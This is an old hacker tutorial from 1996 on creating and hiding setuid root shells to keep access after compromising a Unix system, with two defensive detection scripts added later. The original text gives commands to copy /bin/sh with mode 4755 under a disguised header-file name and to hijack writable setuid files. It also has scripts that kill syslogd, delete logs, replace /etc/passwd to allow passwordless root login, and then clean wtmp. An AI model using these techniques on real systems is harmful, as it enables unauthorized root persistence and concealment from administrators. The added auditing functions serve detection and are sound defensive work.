Suid Shells

by HaWzA of -=(PHILA)=-

hawza@joep.easynet.co.uk


What is a Shell?

A shell is basically a command interpreter like command.com in DOS. It takes your commands such as ls and then runs the corresponding program. There are several flavours of shell, such as the standard Bourne shell (sh) or the C shell (csh).

What is a Suid Shell?

A suid shell is a shell that is set to run with the privileges of the owner. So for example if root is the owner then you can execute commands as root ;) Normal shells are set rwxr-xr-x, which means that root can read, write and execute the shell but everyone else can only read and execute it, and it runs with their own privilege level, i.e. none of root's.

However if you see a shell set like this, rwsr-xr-x (notice the s), then that program is set to run with the privileges of the owner. If this is root then anyone who runs it can do anything on the system they want.. such as add users, change root's password, remove logging etc... all kinds of fun stuff!

Why do I need one?

Easy question to answer. Once you've hacked root by whatever method, the sysadmin will fairly quickly spot that something has gone awry. Most of the time they will read the logs and change root's password. Wave bye bye to your access.

However if you create a suid shell you never have to log in as root, the system logs rarely show that anyone is doing anything as root, and if the sysadmin does notice, he will think that he has been hacked again and change root's password. So what? You don't need it with one of these! Plus you can make as many copies of these as you like, so if one is found you have a few spares ;)

Ok how do I get one then??

Hmm, the tricky bit this.. It really depends on the sysadmin that you have. I have several on different machines and most of them were created by hanging around a sysadmin's machine until he went to have a piss or make a coffee and then quickly creating it using a window left logged in as root. Or you can soc eng the password.. or use one of the myriad of security holes in Unix.. whatever you want really.

Once you get root, find a directory on the machine that is hardly ever used, cause you really don't want to be found with one in your home dir, do you? A good place to keep them is deep in the /usr dir such as /usr/X11/include/X11/extensions. No one pokes around in there! Also the dir should be fairly full, cause most sysadmins won't check through all files in a dir for suid shells. Also you should name them something similar to the files in the dir. For example in the above dir the files are called sync.h, shape.h etc.. so call the shell, say, part.h

Another good place is to hide it in a dir with other suid proggies like /usr/sbin/ and call it something reasonable.

Then you want to create the suid shell in this dir. This is done by typing this:

cp /bin/sh /usr/X11/include/X11/extensions/part.h
chmod 4755 /usr/X11/include/X11/extensions/part.h

The leading 4 is the suid bit; mode 4755 gives the rwsr-xr-x permissions shown above.

But I have also got them by finding a program with its permissions set thus, rwsrwxr-x, or in fact ANY file that is suid to root with write access for group or world. Now this file can be anything initially, a text file, a binary, a picture, anything.. you create the shell like this, assuming the file that is suid is called fart.

cp fart fart1
cat /bin/sh > fart

Then you have to copy fart to a good dir and then copy fart1 back to fart. This is done using a shell script run with the new suid shell, such as this.

#!/fart

cp fart /usr/X11/include/X11/extensions/part.h
mv fart1 fart
chmod 4755 /usr/X11/include/X11/extensions/part.h
exit

Obviously this all takes time and in this case, as with most hacks, you have to plan and be prepared for the occasion. I always investigate a system and plan it before I even try. Also I always create at least two or three of them so if one is found I have a few more. And each time I login I check to see if they are all still there.

That's it! You now have a program that will allow you to execute commands as root!
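
The check a sysadmin would run against the two hiding tricks above (a copy of /bin/sh with a header-file name, and a setuid file that group or world can overwrite), written here as an added example and not part of the original article. It assumes the shell list in KNOWN_SHELLS and a POSIX find and cksum; the owner argument defaults to root.

```shell
#!/bin/sh
# Added example, not from the original article: hunt for setuid files that
# look like the hidden /bin/sh copies described above.
# find_suid_shells DIR [OWNER] prints one finding per line:
#   SHELLCOPY path - setuid file whose contents are identical to a known shell
#   WRITABLE  path - setuid file that is group- or world-writable (rwsrwxr-x)
#   MISNAMED  path - setuid executable hiding behind a data-file name (.h, .txt ...)

# Shells to compare against (assumed list; extend it for your system).
KNOWN_SHELLS="/bin/sh /bin/bash /bin/csh /bin/tcsh /bin/ksh /bin/dash /bin/zsh"

# cksum is POSIX; "crc size" is enough to recognise a byte-identical copy.
file_sig() { cksum < "$1" | cut -d' ' -f1,2; }

# One "crc size path" line per known shell that exists on this box.
known_shell_sigs() {
    for s in $KNOWN_SHELLS; do
        if [ -f "$s" ]; then printf '%s %s\n' "$(file_sig "$s")" "$s"; fi
    done
    return 0
}

find_suid_shells() {
    dir=$1
    owner=${2:-root}
    sigs=$(known_shell_sigs)
    # -perm -4000: setuid bit set; -xdev: stay on one filesystem
    find "$dir" -xdev -type f -perm -4000 -user "$owner" 2>/dev/null |
    while IFS= read -r f; do
        if printf '%s\n' "$sigs" | grep -q "^$(file_sig "$f") "; then
            printf 'SHELLCOPY %s\n' "$f"
        fi
        # group (020) or world (002) write bit on a setuid file
        if [ -n "$(find "$f" \( -perm -020 -o -perm -002 \) -print)" ]; then
            printf 'WRITABLE %s\n' "$f"
        fi
        # a setuid "header file" or "picture" is never legitimate
        case "$f" in
            *.h|*.c|*.txt|*.conf|*.gif|*.jpg) printf 'MISNAMED %s\n' "$f" ;;
        esac
    done
    return 0
}
```

Run it as `find_suid_shells /usr` on a live system; the full-tree scan is slow but reads only files that already carry the setuid bit.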

I have one now but how do I use it?

Generally you will find that most systems will not let you run anything but registered shells as your shell. You can check this by poking around in /etc. On my Linux machine there is a file called shells that lists all of the files that are allowed to be run as shells. But you can run scripts using anything as a shell! Say you wanna move /etc/passwd to /etc/passwd.heh. To do this you write a script like this:

#!/usr/X11/include/X11/extensions/part.h

mv /etc/passwd /etc/passwd.heh
exit

Obviously you don't want to do this unless you wanna shag the system for a while ;)

So basically you are limited to non-interactive applications. However, provided the script is well written, you can actually do virtually anything with the configuration of the system from a script.

But if you really need interactive access then you can follow this procedure; it's best to prepare the scripts first.

First copy /etc/passwd to your home dir and edit it to remove the encrypted form of root's password. Then type 'ps ax | grep syslog' to get the process number. Now run the following script, invoked as 'interactive XX' (where XX is the process number for syslogd).

#!/usr/X11/include/X11/extensions/part.h

kill -9 $1
rm -f /var/adm/syslog
cp /etc/passwd /etc/passwd.OLD
cp ~hawza/passwd /etc/passwd
chmod 644 /etc/passwd
exit

Now login as root with no password 8)

Once you're finished you should run the following script to replace the original passwd file.

#!/usr/X11/include/X11/extensions/part.h

cp /etc/passwd.OLD /etc/passwd
chmod 644 /etc/passwd
exit

Then you should use a wtmp editor to clean up after you.
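
An added example, not from the original article, that audits a passwd file for what the procedure above leaves behind and for the /etc/shells point made earlier: a root entry with an empty password field, extra uid 0 accounts, login shells not registered in the shells file, and stray passwd.OLD copies. The passwd and shells paths are parameters so it can run against constructed files.

```shell
#!/bin/sh
# Added example, not from the original article: audit a passwd file for the
# traces left by the "interactive access" procedure above.
# audit_passwd PASSWD_FILE [SHELLS_FILE] prints one finding per line and
# returns 1 when anything was found, 0 when the file looks clean:
#   EMPTYPW  user        - empty password field (root with no password)
#   UID0     user        - an account other than root with uid 0
#   BADSHELL user shell  - login shell not registered in the shells file
audit_passwd() {
    pw=$1
    shells=${2:-/etc/shells}
    found=0
    while IFS=: read -r user pass uid gid gecos home shell; do
        case "$user" in ''|'#'*) continue ;; esac
        if [ -z "$pass" ]; then
            printf 'EMPTYPW %s\n' "$user"; found=1
        fi
        if [ "$uid" = 0 ] && [ "$user" != root ]; then
            printf 'UID0 %s\n' "$user"; found=1
        fi
        # nologin/false are deliberately absent from /etc/shells, so skip them
        case "$shell" in ''|*/nologin|*/false) continue ;; esac
        if [ -f "$shells" ] && ! grep -Fqx "$shell" "$shells"; then
            printf 'BADSHELL %s %s\n' "$user" "$shell"; found=1
        fi
    done < "$pw"
    return "$found"
}

# Backup copies left beside the real file (the script above leaves /etc/passwd.OLD).
# find_passwd_backups [ETC_DIR] lists them, one per line.
find_passwd_backups() {
    for f in "${1:-/etc}"/passwd.*; do
        [ -f "$f" ] && printf '%s\n' "$f"
    done
    return 0
}
```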


That's basically it, I'm sure I have probably made a mistake so read it carefully and think out exactly what you are doing before you do it ;)


Submissions, corrections, comments, input, complaints, bomb threats, cash etc., should be directed to HaWzA



Phreaking and Hacking all over London 1996